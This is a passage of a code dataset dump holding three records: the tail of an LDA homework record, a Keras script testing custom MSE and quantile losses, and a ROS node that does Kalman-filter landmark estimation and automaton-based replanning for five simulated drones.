get_normalized_review(x))\n","repo_name":"annette-st/NLP_homework","sub_path":"lda/lda.py","file_name":"lda.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"41648725457","text":"# 커스텀 로스를 해보자 \n\nimport numpy as np\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense\nimport tensorflow as tf\nimport tensorflow.keras.backend as K\n\n#===========================================================\n\n# mse 만들기\ndef custom_mse(y_true, y_pred): # y_true, y_pred 의 이름을 바꿔도 알아서 y원래값과 y예측값으로 들어간다.\n return tf.math.reduce_mean(tf.square(y_true-y_pred)) # 이 식이 원래 mse의 식 #square = 제곱한 것\n\n\n# 퀀타일 로스1를 지정해주자\ndef quantile_loss(y_true, y_pred):\n qs = [0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9]\n q = tf.constant(np.array([qs]), dtype=tf.float32) # constant = 상수라는 뜻\n e = y_true - y_pred\n v = tf.maximum(q*e, (q-1)*e)\n return K.mean(v)\n\n# 데이콘 베이스라인에서 가져온 퀀타일 로스\ndef quantile_loss_dacon(q, y_true, y_pred):\n err = (y_true - y_pred)\n return K.mean(K.maximum(q*err, (q-1)*err), axis=-1)\n\nquantiles = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]\n\n#===========================================================\n\n#1. 데이터\nx = np.array([1,2,3,4,5,6,7,8]).astype('float32') # 이렇게 실수형으로 바꾸든\n# x = np.array([1.,2.,3.,4.,5.,6.,7.,8.]).astype('float32') # 이렇게 실수형으로 바꾸든\ny = np.array([1,2,3,4,5,6,7,8]).astype('float32')\nprint(x.shape) #(8, ) 스칼라가 8개\n\n\n#2. 모델\nmodel = Sequential()\nmodel.add(Dense(10, input_shape=(1,)))\nmodel.add(Dense(10))\nmodel.add(Dense(1))\n\n# model.compile(loss=quantile_loss, optimizer='adam')\nmodel.compile(loss = lambda y_true, y_pred: quantile_loss_dacon(quantiles[0], y_true, y_pred), optimizer='adam') # 데이콘에서 가져온 것 \n\n# quantiles[0] = 0.1 이다.\n# lambda y_true, y_pred: quantile_loss(q, y_true, y_pred)\n# ------------- --------------------------------\n# 이거를 여기에 넣겠다.\n\n\nmodel.fit(x, y, epochs=50, batch_size=1)\n\nloss = model.evaluate(x,y)\nprint(loss)\n\n# mse 만들어준거\n# 0.00034028213121928275\n\n# 퀀타일1 만든거\n# 0.008313745260238647\n\n# 퀀타일 [0]째 거\n# 0.0066979192197322845\n","repo_name":"YoungriKIM/STUDY","sub_path":"keras/keras60_3_quantile_loss_dacon.py","file_name":"keras60_3_quantile_loss_dacon.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"33830178584","text":"#!/usr/bin/env python\nimport rospy\nimport numpy as np\nfrom nav_msgs.msg import Odometry\nfrom nav_msgs.msg import Path\nfrom sensor_msgs.msg import Image\nfrom geometry_msgs.msg import PoseStamped, Point, Pose2D, Quaternion\nfrom visualization_msgs.msg import Marker\nfrom std_msgs.msg import Header, ColorRGBA, Bool, Int32\n\n\nfrom kf import kf_update\nfrom workspace import Workspace\nfrom task import Task\nfrom biased_TLRRT_star import generate_NBA, generate_path\nfrom neural_net import generate_nn_output\n# from display_landmark import show_landmark1#, show_landmark2\n\nchannel_open = True\n\ngot_image_1 = False\ngot_image_2 = False\ngot_image_3 = False\ngot_image_4 = False\ngot_image_5 = False\n\nmarker_1 = Marker()\nmarker_2 = Marker()\nmarker_3 = Marker()\nmarker_4 = Marker()\nmarker_5 = Marker()\nmarker_6 = Marker()\nmarker_7 = Marker()\nmarker_8 = Marker()\nmarker_9 = Marker()\nmarker_10 = Marker()\nmarker_11 = Marker()\nmarker_12 = Marker()\nmarker_13 = Marker()\nlm_marker_1 = Marker()\nlm_marker_2 = Marker()\nlm_marker_3 = Marker()\nlm_marker_4 = Marker()\nlm_marker_5 = Marker()\nlm_marker_6 = Marker()\nlm_marker_7 = Marker()\nlm_marker_8 = Marker()\nlm_marker_9 = Marker()\nlm_marker_10 = Marker()\nlm_marker_11 = Marker()\nlm_marker_12 = Marker()\nlm_marker_13 = Marker()\n\nrob1_wp_id = 0\nrob2_wp_id = 0\nrob3_wp_id = 0\nrob4_wp_id = 0\nrob5_wp_id = 0\n\nprint(\"testing workflow 1\")\nworkspace = Workspace()\nworkspace.update_covariance_shape()\ntask=Task()\nall_robot_waypoints = []\nrobot_wp_satsify_AP = []\nnum_of_classes = workspace.no_of_classes \n\ndisplay_target_landmarks = True\nsensor_noise_cov = [[0.2, 0], [0, 0.2]]\n\"\"\"\nexample of defining the sensor model:\nsensor_model = [[P(person|person), \tP(person|car), \tP(person|bike)],\n\t\t\t\t[P(car|person), \tP(car|car), \tP(car|bike)],\n\t\t\t\t[P(bike|person),\tP(bike|car), \tP(bike|bike)]]\n\"\"\"\nsensor_model = [[0.80, 0.18, 0.02],\n\t\t\t\t[0.23, 0.75, 0.02],\n\t\t\t\t[0.06, 0.04, 0.9]] \n\nbuchi, buchi_graph = generate_NBA()\n\nprint(\"testing workflow 2\")\n\ndef update_landmark_estimates(nn_output):\n\tglobal workspace\n\tfor key in nn_output.keys():\n\t\tx_estimate = workspace.landmark[key][0]\n\t\tcov = workspace.landmark[key][1]\n\t\tobs = nn_output[key][1]\n\t\tx_estimate, cov = kf_update(cov, x_estimate, obs, sensor_noise_cov)\n\t\tworkspace.landmark[key][0] = x_estimate\n\t\tworkspace.landmark[key][1]= cov\n\t\tworkspace.generate_samples_for_lm(key)\n\t\tworkspace.update_covariance_shape_for_lm(key)\n\t\t\n\ndef update_class_distribution(nn_output):\n\tglobal workspace\n\tfor key in nn_output.keys():\n\t\tpair = key.split('_') # region-robot pair\n\t\trobot_index = int(pair[0][1:]) - 1\n\t\tclass_id = nn_output[key][0][0] - 1\n\t\tcond_prob = np.empty((num_of_classes,), float)\n\t\tcond_prob[class_id] = nn_output[key][2][class_id]\n\t\tfor i in range(num_of_classes):\n\t\t\tif i!=class_id:\n\t\t\t\tcond_prob[i] = sensor_model[class_id][i]\n\t\tworkspace.classes[robot_index] = workspace.classes[robot_index]*cond_prob/(workspace.classes[robot_index]*cond_prob).sum()\n\n\ndef get_lm_color(nba_truth, num_of_lm):\n \"\"\"\n 1: neutral\n 2: landmark\n 3: avoid\n \"\"\"\n lm_color=np.ones(num_of_lm)\n if nba_truth['truth']!='1':\n\t for key in nba_truth['truth'].keys():\n\t if nba_truth['truth'][key]==True:\n\t pair = key.split('_')\n\t lm_color[int(pair[0][1:])-1] = 2\n for key in nba_truth['avoid'].keys():\n for j in range(len(nba_truth['avoid'][key])):\n 
lm_color[int(nba_truth['avoid'][key][j][0][1:])-1]=3\n for key in nba_truth['avoid_self_loop'].keys():\n for j in range(len(nba_truth['avoid_self_loop'][key])):\n lm_color[int(nba_truth['avoid_self_loop'][key][j][0][1:])-1]=3\n return lm_color\n\n\ndef show_landmark1(data,key_id,position,shape,marker):\n\tchord1 = shape[0][0]\n\tchord2 = shape[0][1]\n\tif chord1>chord2:\n\t\tlong_chord = chord1\n\telse:\n\t\tlong_chord = chord2\n\tif chord1<0.5:\n\t\tchord1=0.5\n\tif chord2<0.5:\n\t\tchord2=0.5\n\theight = 2/long_chord\n\tif height>4:\n\t\theight = 4\n\n\tmarker.header = data.header\n\tmarker.type = Marker.CYLINDER\n\tmarker.pose.position.x = position[0]\n\tmarker.pose.position.y = position[1]\n\tmarker.pose.position.z = height/2\n\tmarker.pose.orientation = Quaternion(0,0,shape[1][0],shape[1][1])\n\n\tmarker.scale.x = chord1\n\tmarker.scale.y = chord2\n\n\tmarker.scale.z = height\n\tmarker.color=ColorRGBA(0.013, 0.01, 0.9, 0.8)\n\tmarker.lifetime=rospy.Duration()\n\ndef show_landmark_color(data,key_id,marker,lm_color):\n\tmarker.header = data.header\n\tmarker.type = Marker.CYLINDER\n\tmarker.pose.position.x = workspace.landmark[key_id][0][0]\n\tmarker.pose.position.y = workspace.landmark[key_id][0][1]\n\tmarker.pose.position.z = 0.15\n\tmarker.pose.orientation = Quaternion(0,0,workspace.landmark['l1'][2][1][0],workspace.landmark['l1'][2][1][1])\n\tif lm_color==1:\n\t\tmarker.scale.x = 0.01\n\t\tmarker.scale.y = 0.01\n\t\tmarker.scale.z = 0.2\n\t\tmarker.color=ColorRGBA(0.013, 0.01, 0.9, 0.8)\n\telif lm_color==2:\n\t\tmarker.scale.x = 2\n\t\tmarker.scale.y = 2\n\t\tmarker.scale.z = 0.2\n\t\tmarker.color=ColorRGBA(0.013, 0.9, 0.01, 0.8)\n\telse:\n\t\tmarker.scale.x = 2\n\t\tmarker.scale.y = 2\n\t\tmarker.scale.z = 0.2\n\t\tmarker.color=ColorRGBA(0.9, 0.01, 0.01, 0.8)\n\tmarker.lifetime=rospy.Duration()\n\ndef show_all_landmarks(data):\n\tshow_landmark1(data,'l1', workspace.landmark['l1'][0], workspace.landmark['l1'][2],marker_1)\n\tmarker_pub_1.publish(marker_1)\n\tshow_landmark1(data,'l2', workspace.landmark['l2'][0], workspace.landmark['l2'][2],marker_2)\n\tmarker_pub_2.publish(marker_2)\n\tshow_landmark1(data,'l3', workspace.landmark['l3'][0], workspace.landmark['l3'][2],marker_3)\n\tmarker_pub_3.publish(marker_3)\n\tshow_landmark1(data,'l4', workspace.landmark['l4'][0], workspace.landmark['l4'][2],marker_4)\n\tmarker_pub_4.publish(marker_4)\n\tshow_landmark1(data,'l5', workspace.landmark['l5'][0], workspace.landmark['l5'][2],marker_5)\n\tmarker_pub_5.publish(marker_5)\n\tshow_landmark1(data,'l6', workspace.landmark['l6'][0], workspace.landmark['l6'][2],marker_6)\n\tmarker_pub_6.publish(marker_6)\n\tshow_landmark1(data,'l7', workspace.landmark['l7'][0], workspace.landmark['l7'][2],marker_7)\n\tmarker_pub_7.publish(marker_7)\n\tshow_landmark1(data,'l8', workspace.landmark['l8'][0], workspace.landmark['l8'][2],marker_8)\n\tmarker_pub_8.publish(marker_8)\n\tshow_landmark1(data,'l9', workspace.landmark['l9'][0], workspace.landmark['l9'][2],marker_9)\n\tmarker_pub_9.publish(marker_9)\n\tshow_landmark1(data,'l10', workspace.landmark['l10'][0], workspace.landmark['l10'][2],marker_10)\n\tmarker_pub_10.publish(marker_10)\n\tshow_landmark1(data,'l11', workspace.landmark['l11'][0], workspace.landmark['l11'][2],marker_11)\n\tmarker_pub_11.publish(marker_11)\n\tshow_landmark1(data,'l12', workspace.landmark['l12'][0], workspace.landmark['l12'][2],marker_12)\n\tmarker_pub_12.publish(marker_12)\n\tshow_landmark1(data,'l13', workspace.landmark['l13'][0], 
workspace.landmark['l13'][2],marker_13)\n\tmarker_pub_13.publish(marker_13)\n\tnumber_of_landmarks = 13\n\n\tif not isinstance(rob1_wp_id, int) and display_target_landmarks:\n\t\tif rob1_wp_id.data < len(all_robot_waypoints[0]):\n\t\t\tlm_color = get_lm_color(buchi_graph.edges[(all_robot_waypoints[0][rob1_wp_id.data][2:])], number_of_landmarks)\n\t\t\tshow_landmark_color(data,'l1',lm_marker_1,lm_color[0])\n\t\t\tlm_marker_pub_1.publish(lm_marker_1)\n\t\t\tshow_landmark_color(data,'l2',lm_marker_2,lm_color[1])\n\t\t\tlm_marker_pub_2.publish(lm_marker_2)\n\t\t\tshow_landmark_color(data,'l3',lm_marker_3,lm_color[2])\n\t\t\tlm_marker_pub_3.publish(lm_marker_3)\n\t\t\tshow_landmark_color(data,'l4',lm_marker_4,lm_color[3])\n\t\t\tlm_marker_pub_4.publish(lm_marker_4)\n\t\t\tshow_landmark_color(data,'l5',lm_marker_5,lm_color[4])\n\t\t\tlm_marker_pub_5.publish(lm_marker_5)\n\t\t\tshow_landmark_color(data,'l6',lm_marker_6,lm_color[5])\n\t\t\tlm_marker_pub_6.publish(lm_marker_6)\n\t\t\tshow_landmark_color(data,'l7',lm_marker_7,lm_color[6])\n\t\t\tlm_marker_pub_7.publish(lm_marker_7)\n\t\t\tshow_landmark_color(data,'l8',lm_marker_8,lm_color[7])\n\t\t\tlm_marker_pub_8.publish(lm_marker_8)\n\t\t\tshow_landmark_color(data,'l9',lm_marker_9,lm_color[8])\n\t\t\tlm_marker_pub_9.publish(lm_marker_9)\n\t\t\tshow_landmark_color(data,'l10',lm_marker_10,lm_color[9])\n\t\t\tlm_marker_pub_10.publish(lm_marker_10)\n\t\t\tshow_landmark_color(data,'l11',lm_marker_11,lm_color[10])\n\t\t\tlm_marker_pub_11.publish(lm_marker_11)\n\t\t\tshow_landmark_color(data,'l12',lm_marker_12,lm_color[11])\n\t\t\tlm_marker_pub_12.publish(lm_marker_12)\n\t\t\tshow_landmark_color(data,'l13',lm_marker_13,lm_color[12])\n\t\t\tlm_marker_pub_13.publish(lm_marker_13)\n\n# def show_landmark2(data,key_id,shape):\n# \tglobal marker_2 \n# \tmarker_2.header = data.header\n# \tmarker_2.type = Marker.CYLINDER\n# \tmarker_2.pose.position.x = workspace.landmark[key_id][0][0]\n# \tmarker_2.pose.position.y = workspace.landmark[key_id][0][1]\n# \tmarker_2.pose.position.z = 1\n# \tmarker_2.scale.x = 0.50\n# \tmarker_2.scale.y = 0.50\n# \tmarker_2.scale.z = 4\n# \tmarker_2.color=ColorRGBA(0.013, 0.01, 0.9, 0.8)\n# \tmarker_2.lifetime=rospy.Duration()\n# \tmarker_pub_2.publish(marker_2)\n\ndef publish_path_status(is_path_ready):\n\tpath_ready_pub1.publish(is_path_ready)\n\tpath_ready_pub2.publish(is_path_ready)\n\tpath_ready_pub3.publish(is_path_ready)\n\tpath_ready_pub4.publish(is_path_ready)\n\tpath_ready_pub5.publish(is_path_ready)\n\n\ndef get_curr_rob_states(wp_id):\n init=[]\n pos=[]\n for i in range(buchi.number_of_robots):\n pos.append(tuple(all_robot_waypoints[i][wp_id][:2]))\n init.append(tuple(pos))\n init.append(all_robot_waypoints[0][wp_id][2])\n return tuple(init)\n\n\ndef detect_in_vid1(data):\n\tglobal got_image_1\n\tgot_image_1 = True\n\ndef detect_in_vid2(data):\n\tglobal got_image_2\n\tgot_image_2 = True\n\ndef detect_in_vid3(data):\n\tglobal got_image_3\n\tgot_image_3 = True\n\t\ndef detect_in_vid4(data):\n\tglobal got_image_4\n\tgot_image_4 = True\n\t\ndef detect_in_vid5(data):\n\tglobal got_image_5\n\tgot_image_5 = True\n\n \ndef odom_cb1(data):\n\tglobal got_image_1\n\tglobal workspace\n\t# print(rob1_wp_id)\n\tglobal channel_open\n\t# print(\"channel status in 1:\", channel_open)\n\tif channel_open:\n\t\tchannel_open = False\n\t\tif got_image_1:\n\t\t\tnn_output = generate_nn_output(data)\n\t\t\tgot_image_1 = 
False\n\t\t\tupdate_landmark_estimates(nn_output)\n\t\t\tupdate_class_distribution(nn_output)\n\t\t\tshow_all_landmarks(data)\n\t\t\tif nn_output:\n\t\t\t\tglobal all_robot_waypoints\n\t\t\t\tglobal robot_wp_satsify_AP\n\t\t\t\t\n\t\t\t\tif rob1_wp_id.data < len(all_robot_waypoints[0]):\n\t\t\t\t\trob_waypoint = all_robot_waypoints[0][rob1_wp_id.data]\n\t\t\t\t\tnext_rob_waypoint = []\n\t\t\t\t\tfor i in range(buchi.number_of_robots):\n\t\t\t\t\t\tnext_rob_waypoint.append(all_robot_waypoints[i][rob1_wp_id.data+1:rob1_wp_id.data+10])\n\n\t\t\t\t\treplanning_bool = task.Replanning_check(rob_waypoint, next_rob_waypoint, workspace, robot_wp_satsify_AP, 1, buchi_graph)\n\t\t\t\t\tif replanning_bool:\n\t\t\t\t\t\tis_path_ready = False\n\t\t\t\t\t\tpublish_path_status(is_path_ready)\n\t\t\t\t\t\n\t\t\t\t\t\tprint(\"\\n*\\n*\\nCalculating path\\n*\\n*\\n\")\n\t\t\t\t\t\tinit_state = get_curr_rob_states(rob1_wp_id.data)\n\t\t\t\t\t\tall_robot_waypoints,robot_wp_satsify_AP = generate_path(buchi, buchi_graph, workspace, init_state, save_waypoints = True, edit_launch_file=False, save_covariances = False)\n\t\t\t\t\t\tprint(\"\\n Calculated path from cb 1\\n\")\n\n\t\t\t\t\t\tprint(\"\\n set path ready true\\n\")\n\t\t\t\t\t\t\n\t\t\t\t\t\tis_path_ready = True\n\t\t\t\t\t\tpublish_path_status(is_path_ready)\n\t\tchannel_open = True\n\t\t# print(\"exit channel operation 1\")\n\n\n\n\n# 2\ndef odom_cb2(data):\n\tglobal got_image_2\n\tglobal channel_open\n\t# print(\"channel status in 2:\", channel_open)\n\tif channel_open:\n\t\tchannel_open = False\n\t\tif got_image_2:\t\n\t\t\tnn_output = generate_nn_output(data)\n\t\t\tgot_image_2 = False\n\t\t\tupdate_landmark_estimates(nn_output)\n\t\t\tupdate_class_distribution(nn_output)\n\t\t\tshow_all_landmarks(data)\n\t\t\tif nn_output:\n\t\t\t\tglobal all_robot_waypoints\n\t\t\t\tglobal robot_wp_satsify_AP\n\t\t\t\t\n\t\t\t\tif rob2_wp_id.data < len(all_robot_waypoints[0]):\n\t\t\t\t\trob_waypoint = all_robot_waypoints[0][rob2_wp_id.data]\n\t\t\t\t\tnext_rob_waypoint = []\n\t\t\t\t\tfor i in range(buchi.number_of_robots):\n\t\t\t\t\t\tnext_rob_waypoint.append(all_robot_waypoints[i][rob2_wp_id.data+1:rob2_wp_id.data+10])\n\t\t\t\t\treplanning_bool = task.Replanning_check(rob_waypoint, next_rob_waypoint, workspace, robot_wp_satsify_AP, 2, buchi_graph)\n\t\t\t\t\tif replanning_bool:\n\t\t\t\t\t\tis_path_ready = False\n\t\t\t\t\t\tpublish_path_status(is_path_ready)\n\t\t\t\t\t\n\t\t\t\t\t\tprint(\"\\n*\\n*\\nCalculating path\\n*\\n*\\n\")\n\t\t\t\t\t\tinit_state = get_curr_rob_states(rob2_wp_id.data)\n\t\t\t\t\t\tall_robot_waypoints,robot_wp_satsify_AP = generate_path(buchi, buchi_graph, workspace, init_state, save_waypoints = True, edit_launch_file=False, save_covariances = False)\n\t\t\t\t\t\tprint(\"\\n Calculated path from cb 2\\n\")\n\n\t\t\t\t\t\tprint(\"\\n set path ready true\\n\")\n\t\t\t\t\t\t\n\t\t\t\t\t\tis_path_ready = True\n\t\t\t\t\t\tpublish_path_status(is_path_ready)\n\t\tchannel_open = True\n\t\t# print(\"exit channel operation 2\")\n\n\n# 3\ndef odom_cb3(data):\n\tglobal got_image_3\n\tglobal channel_open\n\t# print(\"channel status in 3:\", channel_open)\n\tif channel_open:\n\t\tchannel_open = False\n\t\tif got_image_3:\n\t\t\tnn_output = generate_nn_output(data)\n\t\t\tgot_image_3 = False\n\t\t\tupdate_landmark_estimates(nn_output)\n\t\t\tupdate_class_distribution(nn_output)\n\t\t\tshow_all_landmarks(data)\n\t\t\tif nn_output:\n\t\t\t\tglobal all_robot_waypoints\n\t\t\t\tglobal robot_wp_satsify_AP\n\t\t\t\t\n\t\t\t\tif rob3_wp_id.data < 
len(all_robot_waypoints[0]):\n\t\t\t\t\trob_waypoint = all_robot_waypoints[0][rob3_wp_id.data]\n\t\t\t\t\tnext_rob_waypoint = []\n\t\t\t\t\tfor i in range(buchi.number_of_robots):\n\t\t\t\t\t\tnext_rob_waypoint.append(all_robot_waypoints[i][rob3_wp_id.data+1:rob3_wp_id.data+10])\n\t\t\t\t\n\t\t\t\t\treplanning_bool = task.Replanning_check(rob_waypoint, next_rob_waypoint, workspace, robot_wp_satsify_AP, 3, buchi_graph)\n\t\t\t\t\tif replanning_bool:\n\t\t\t\t\t\tis_path_ready = False\n\t\t\t\t\t\tpublish_path_status(is_path_ready)\n\t\t\t\t\t\n\t\t\t\t\t\tprint(\"\\n*\\n*\\nCalculating path\\n*\\n*\\n\")\n\t\t\t\t\t\tinit_state = get_curr_rob_states(rob3_wp_id.data)\n\t\t\t\t\t\tall_robot_waypoints,robot_wp_satsify_AP = generate_path(buchi, buchi_graph, workspace, init_state, save_waypoints = True, edit_launch_file=False, save_covariances = False)\n\t\t\t\t\t\tprint(\"\\n Calculated path from cb 3\\n\")\n\n\t\t\t\t\t\tprint(\"\\n set path ready true\\n\")\n\t\t\t\t\t\t\n\t\t\t\t\t\tis_path_ready = True\n\t\t\t\t\t\tpublish_path_status(is_path_ready)\n\t\tchannel_open = True\n\t\t# print(\"exit channel operation 3\")\n\n# 4\ndef odom_cb4(data):\n\tglobal got_image_4\n\tglobal channel_open\n\t# print(\"channel status in 4:\", channel_open)\n\tif channel_open:\n\t\tchannel_open = False\n\t\tif got_image_4:\n\t\t\tnn_output = generate_nn_output(data)\n\t\t\tgot_image_4 = False\n\t\t\tupdate_landmark_estimates(nn_output)\n\t\t\tupdate_class_distribution(nn_output)\n\t\t\tshow_all_landmarks(data)\n\t\t\tif nn_output:\n\t\t\t\tglobal all_robot_waypoints\n\t\t\t\tglobal robot_wp_satsify_AP\n\t\t\t\t\n\t\t\t\tif rob4_wp_id.data < len(all_robot_waypoints[0]):\n\t\t\t\t\trob_waypoint = all_robot_waypoints[0][rob4_wp_id.data]\n\t\t\t\t\tnext_rob_waypoint = []\n\t\t\t\t\tfor i in range(buchi.number_of_robots):\n\t\t\t\t\t\tnext_rob_waypoint.append(all_robot_waypoints[i][rob4_wp_id.data+1:rob4_wp_id.data+10])\n\t\t\t\t\t\n\t\t\t\t\treplanning_bool = task.Replanning_check(rob_waypoint, next_rob_waypoint, workspace, robot_wp_satsify_AP, 4, buchi_graph)\n\t\t\t\t\tif replanning_bool:\n\t\t\t\t\t\tis_path_ready = False\n\t\t\t\t\t\tpublish_path_status(is_path_ready)\n\t\t\t\t\t\n\t\t\t\t\t\tprint(\"\\n*\\n*\\nCalculating path\\n*\\n*\\n\")\n\t\t\t\t\t\tinit_state = get_curr_rob_states(rob4_wp_id.data)\n\t\t\t\t\t\tall_robot_waypoints,robot_wp_satsify_AP = generate_path(buchi, buchi_graph, workspace, init_state, save_waypoints = True, edit_launch_file=False, save_covariances = False)\n\t\t\t\t\t\tprint(\"\\n Calculated path from cb 4\\n\")\n\n\t\t\t\t\t\tprint(\"\\n set path ready true\\n\")\n\t\t\t\t\t\t\n\t\t\t\t\t\tis_path_ready = True\n\t\t\t\t\t\tpublish_path_status(is_path_ready)\n\t\tchannel_open = True\n\t\t# print(\"exit channel operation 4\")\n\n# 5\ndef odom_cb5(data):\n\tglobal got_image_5\n\tglobal channel_open\n\t# print(\"channel status in 5:\", channel_open)\n\tif channel_open:\n\t\tchannel_open = False\n\t\tif got_image_5:\t\n\t\t\tnn_output = generate_nn_output(data)\n\t\t\tgot_image_5 = False\n\t\t\tupdate_landmark_estimates(nn_output)\n\t\t\tupdate_class_distribution(nn_output)\n\t\t\tshow_all_landmarks(data)\n\t\t\tif nn_output:\n\t\t\t\tglobal all_robot_waypoints\n\t\t\t\tglobal robot_wp_satsify_AP\n\t\t\t\t\n\t\t\t\tif rob5_wp_id.data < len(all_robot_waypoints[0]):\n\t\t\t\t\trob_waypoint = all_robot_waypoints[0][rob5_wp_id.data]\n\t\t\t\t\tnext_rob_waypoint = []\n\t\t\t\t\tfor i in 
range(buchi.number_of_robots):\n\t\t\t\t\t\tnext_rob_waypoint.append(all_robot_waypoints[i][rob5_wp_id.data+1:rob5_wp_id.data+10])\n\t\t\t\t\t\n\t\t\t\t\treplanning_bool = task.Replanning_check(rob_waypoint, next_rob_waypoint, workspace, robot_wp_satsify_AP, 5, buchi_graph)\n\t\t\t\t\tif replanning_bool:\n\t\t\t\t\t\tis_path_ready = False\n\t\t\t\t\t\tpublish_path_status(is_path_ready)\n\t\t\t\t\t\n\t\t\t\t\t\tprint(\"\\n*\\n*\\nCalculating path\\n*\\n*\\n\")\n\t\t\t\t\t\tinit_state = get_curr_rob_states(rob5_wp_id.data)\n\t\t\t\t\t\tall_robot_waypoints,robot_wp_satsify_AP = generate_path(buchi, buchi_graph, workspace, init_state, save_waypoints = True, edit_launch_file=False, save_covariances = False)\n\t\t\t\t\t\tprint(\"\\n Calculated path from cb 5\\n\")\n\n\t\t\t\t\t\tprint(\"\\n set path ready true\\n\")\n\t\t\t\t\t\t\n\t\t\t\t\t\tis_path_ready = True\n\t\t\t\t\t\tpublish_path_status(is_path_ready)\n\t\tchannel_open = True\n\t\t# print(\"exit channel operation 5\")\n\n\n\ndef wp_id_cb1(data):\n\tglobal rob1_wp_id\n\trob1_wp_id = data\n\t# print(\"firefly 1: \",rob1_wp_id.data)\n\ndef wp_id_cb2(data):\n\tglobal rob2_wp_id\n\trob2_wp_id = data\n\t# print(\"firefly 2: \",rob2_wp_id.data)\n\ndef wp_id_cb3(data):\n\tglobal rob3_wp_id\n\trob3_wp_id = data\n\t# print(\"firefly 3: \",rob3_wp_id.data)\t\n\ndef wp_id_cb4(data):\n\tglobal rob4_wp_id\n\trob4_wp_id = data\n\t# print(\"firefly 4: \",rob4_wp_id.data)\n\ndef wp_id_cb5(data):\n\tglobal rob5_wp_id\n\trob5_wp_id = data\n\t# print(\"firefly 5: \",rob5_wp_id.data)\n\n\n\n\n\n\nif __name__==\"__main__\":\n\tprint(\"testing workflow 3\")\n\n\n\trospy.init_node('neural_network', anonymous=True)\n\n\tpath_ready_pub1 = rospy.Publisher('/firefly1/path_ready', Bool, queue_size=10)\n\tpath_ready_pub2 = rospy.Publisher('/firefly2/path_ready', Bool, queue_size=10)\n\tpath_ready_pub3 = rospy.Publisher('/firefly3/path_ready', Bool, queue_size=10)\n\tpath_ready_pub4 = rospy.Publisher('/firefly4/path_ready', Bool, queue_size=10)\n\tpath_ready_pub5 = rospy.Publisher('/firefly5/path_ready', Bool, queue_size=10)\n\tis_path_ready = False\n\t# path_ready_pub1.publish(is_path_ready)\n\t# path_ready_pub2.publish(is_path_ready)\n\t# path_ready_pub3.publish(is_path_ready)\n\t# path_ready_pub4.publish(is_path_ready)\n\t# path_ready_pub5.publish(is_path_ready)\n\tpublish_path_status(is_path_ready)\n\n\n\tinit_state = (task.init, buchi_graph.graph['init'][0])\n\tall_robot_waypoints,robot_wp_satsify_AP = generate_path(buchi, buchi_graph, workspace, init_state, save_waypoints = True, edit_launch_file=True, save_covariances = False)\n\n\t# marker_pub_1 = rospy.Publisher('/target1/cov/visualization_marker', Marker, queue_size = 10)\n\t# marker_pub_2 = rospy.Publisher('/target1/cov/visualization_marker', Marker, queue_size = 10)\n\t# marker_pub_3 = rospy.Publisher('/firefly3/camera/visualization_marker', Marker, queue_size = 10)\n\t# marker_pub_4 = rospy.Publisher('/firefly4/camera/visualization_marker', Marker, queue_size = 10)\n\t# marker_pub_5 = rospy.Publisher('/firefly5/camera/visualization_marker', Marker, queue_size = 10)\n\tmarker_pub_1 = rospy.Publisher('/target1/cov/visualization_marker', Marker, queue_size = 10)\n\tmarker_pub_2 = rospy.Publisher('/target2/cov/visualization_marker', Marker, queue_size = 10)\n\tmarker_pub_3 = rospy.Publisher('/target3/cov/visualization_marker', Marker, queue_size = 10)\n\tmarker_pub_4 = rospy.Publisher('/target4/cov/visualization_marker', Marker, queue_size = 10)\n\tmarker_pub_5 = 
rospy.Publisher('/target5/cov/visualization_marker', Marker, queue_size = 10)\n\tmarker_pub_6 = rospy.Publisher('/target6/cov/visualization_marker', Marker, queue_size = 10)\n\tmarker_pub_7 = rospy.Publisher('/target7/cov/visualization_marker', Marker, queue_size = 10)\n\tmarker_pub_8 = rospy.Publisher('/target8/cov/visualization_marker', Marker, queue_size = 10)\n\tmarker_pub_9 = rospy.Publisher('/target9/cov/visualization_marker', Marker, queue_size = 10)\n\tmarker_pub_10 = rospy.Publisher('/target10/cov/visualization_marker', Marker, queue_size = 10)\n\tmarker_pub_11 = rospy.Publisher('/target11/cov/visualization_marker', Marker, queue_size = 10)\n\tmarker_pub_12 = rospy.Publisher('/target12/cov/visualization_marker', Marker, queue_size = 10)\n\tmarker_pub_13 = rospy.Publisher('/target13/cov/visualization_marker', Marker, queue_size = 10)\n\n\tlm_marker_pub_1 = rospy.Publisher('/target1/state/visualization_marker', Marker, queue_size = 10)\n\tlm_marker_pub_2 = rospy.Publisher('/target2/state/visualization_marker', Marker, queue_size = 10)\n\tlm_marker_pub_3 = rospy.Publisher('/target3/state/visualization_marker', Marker, queue_size = 10)\n\tlm_marker_pub_4 = rospy.Publisher('/target4/state/visualization_marker', Marker, queue_size = 10)\n\tlm_marker_pub_5 = rospy.Publisher('/target5/state/visualization_marker', Marker, queue_size = 10)\n\tlm_marker_pub_6 = rospy.Publisher('/target6/state/visualization_marker', Marker, queue_size = 10)\n\tlm_marker_pub_7 = rospy.Publisher('/target7/state/visualization_marker', Marker, queue_size = 10)\n\tlm_marker_pub_8 = rospy.Publisher('/target8/state/visualization_marker', Marker, queue_size = 10)\n\tlm_marker_pub_9 = rospy.Publisher('/target9/state/visualization_marker', Marker, queue_size = 10)\n\tlm_marker_pub_10 = rospy.Publisher('/target10/state/visualization_marker', Marker, queue_size = 10)\n\tlm_marker_pub_11 = rospy.Publisher('/target11/state/visualization_marker', Marker, queue_size = 10)\n\tlm_marker_pub_12 = rospy.Publisher('/target12/state/visualization_marker', Marker, queue_size = 10)\n\tlm_marker_pub_13 = rospy.Publisher('/target13/state/visualization_marker', Marker, queue_size = 10)\t\n\n\n\tvid_sub_1 = rospy.Subscriber(\"/firefly1/vi_sensor/left/image_raw\", Image, detect_in_vid1, queue_size = 1)\n\tvid_sub_2 = rospy.Subscriber(\"/firefly2/vi_sensor/left/image_raw\", Image, detect_in_vid2, queue_size = 1)\n\tvid_sub_3 = rospy.Subscriber(\"/firefly3/vi_sensor/left/image_raw\", Image, detect_in_vid3, queue_size = 1)\n\tvid_sub_4 = 